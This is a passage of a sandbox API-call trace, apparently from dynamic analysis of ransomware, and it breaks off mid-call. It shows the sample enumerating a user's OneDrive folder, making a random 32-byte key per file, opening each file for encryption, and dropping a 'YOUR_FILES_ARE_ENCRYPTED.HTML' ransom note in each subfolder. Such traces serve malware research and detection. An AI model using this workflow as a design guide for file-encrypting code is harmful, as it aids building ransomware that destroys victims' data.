hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c4220a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1c4220a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1d118c6c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x362c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncApi.dll", cAlternateFileName="FILESY~3.DLL")) returned 1 [0111.915] StrStrIW (lpFirst="FileSyncApi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.915] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll") returned 91 [0111.915] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0111.915] lstrlenW (lpString=".dll") returned 4 [0111.915] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0111.915] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\filesyncapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.917] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=221888) returned 1 [0111.917] GetProcessHeap () returned 0x600000 [0111.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.919] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="E7") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="67") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="05") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="29") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="5D") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="FE") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="11") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="32") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="01") returned 2 [0111.919] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="27") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="60") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AC") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="B4") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="2C") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C6") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="10") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="2F") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0A") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="9D") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="52") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="74") returned 2 [0111.920] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="4D") returned 2 [0111.920] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="63") returned 2 [0111.920] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="36") returned 2 [0111.920] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="D1") returned 2 [0111.920] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A8") returned 2 [0111.920] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="F5") returned 2 [0111.920] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="2D") returned 2 [0111.920] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="24") returned 2 [0111.920] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="0F") returned 2 [0111.920] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="89") returned 2 [0111.920] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="29") returned 2 [0111.921] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncApi.dll" [0111.921] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.921] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.921] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21721d25, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x21721d25, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x218eb79d, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x1d9ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncClient.dll", cAlternateFileName="FILESY~4.DLL")) returned 1 [0111.921] StrStrIW (lpFirst="FileSyncClient.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.921] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll") returned 94 [0111.921] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0111.921] lstrlenW (lpString=".dll") returned 4 [0111.921] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0111.921] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\filesyncclient.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.924] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1941184) returned 1 [0111.924] GetProcessHeap () returned 0x600000 [0111.924] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0111.926] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="52") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="6E") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="98") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="71") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="47") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="DB") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="EB") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="4F") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="45") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="42") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="18") returned 2 [0111.926] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="41") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="66") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="52") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="74") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C5") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="79") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="E0") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C0") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1A") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="C8") returned 2 [0111.927] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="31") returned 2 [0111.927] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A3") returned 2 [0111.927] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="ED") returned 2 [0111.927] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E0") returned 2 [0111.927] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A7") returned 2 [0111.927] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="3F") returned 2 [0111.927] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="58") returned 2 [0111.927] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="15") returned 2 [0111.927] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="04") returned 2 [0111.927] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="26") returned 2 [0111.927] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1B") returned 2 [0111.928] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncClient.dll" [0111.928] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.928] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0111.928] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27e196bc, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x27e196bc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x27eb206a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x238c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncConfig.exe", cAlternateFileName="FILESY~1.EXE")) returned 1 [0111.928] StrStrIW (lpFirst="FileSyncConfig.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.928] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\FileSyncConfig.exe") returned 94 [0111.928] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0111.928] lstrlenW (lpString=".exe") returned 4 [0111.928] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0111.928] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d93484, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13d93484, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x13d93484, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="is", cAlternateFileName="")) returned 1 [0111.928] StrStrIW (lpFirst="is", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.928] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is") returned 78 [0111.928] GetProcessHeap () returned 0x600000 [0111.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x32a0048 [0111.930] lstrcpyW (in: lpString1=0x32a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is" [0111.930] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\*" [0111.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d93484, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13d93484, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1425801e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0111.940] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d93484, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13d93484, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1425801e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0111.940] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1425801e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1425801e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x146118b3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.941] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.941] wnsprintfW (in: pszDest=0x32a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui") returned 114 [0111.941] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.941] lstrlenW (lpString=".mui") returned 4 [0111.941] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.941] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1425801e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1425801e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x146118b3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.941] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0111.941] wnsprintfW (in: pszDest=0x32a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.941] GetProcessHeap () returned 0x600000 [0111.941] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0111.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.942] WriteFile (in: hFile=0x334, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.943] CloseHandle (hObject=0x334) returned 1 [0111.943] GetProcessHeap () returned 0x600000 [0111.943] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0111.943] GetProcessHeap () returned 0x600000 [0111.944] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0111.953] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x146118b3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x146118b3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x146118b3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="it", cAlternateFileName="")) returned 1 [0111.953] StrStrIW (lpFirst="it", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.953] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it") returned 78 [0111.953] GetProcessHeap () returned 0x600000 [0111.953] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0111.954] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it" [0111.954] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\*" [0111.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x146118b3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x146118b3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x14a89f12, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.955] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x146118b3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x146118b3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x14a89f12, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0111.955] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a89f12, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x14a89f12, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x151d75c6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.955] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.955] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui") returned 114 [0111.955] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.955] lstrlenW (lpString=".mui") returned 4 [0111.955] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.955] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a89f12, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x14a89f12, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x151d75c6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.955] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.955] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.955] GetProcessHeap () returned 0x600000 [0111.955] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0111.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.956] WriteFile (in: hFile=0x310, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.957] CloseHandle (hObject=0x310) returned 1 [0111.958] GetProcessHeap () returned 0x600000 [0111.958] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0111.958] GetProcessHeap () returned 0x600000 [0111.958] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.958] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x153086e5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x153086e5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x153086e5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ja", cAlternateFileName="")) returned 1 [0111.958] StrStrIW (lpFirst="ja", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.958] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja") returned 78 [0111.958] GetProcessHeap () returned 0x600000 [0111.958] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0111.958] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja") 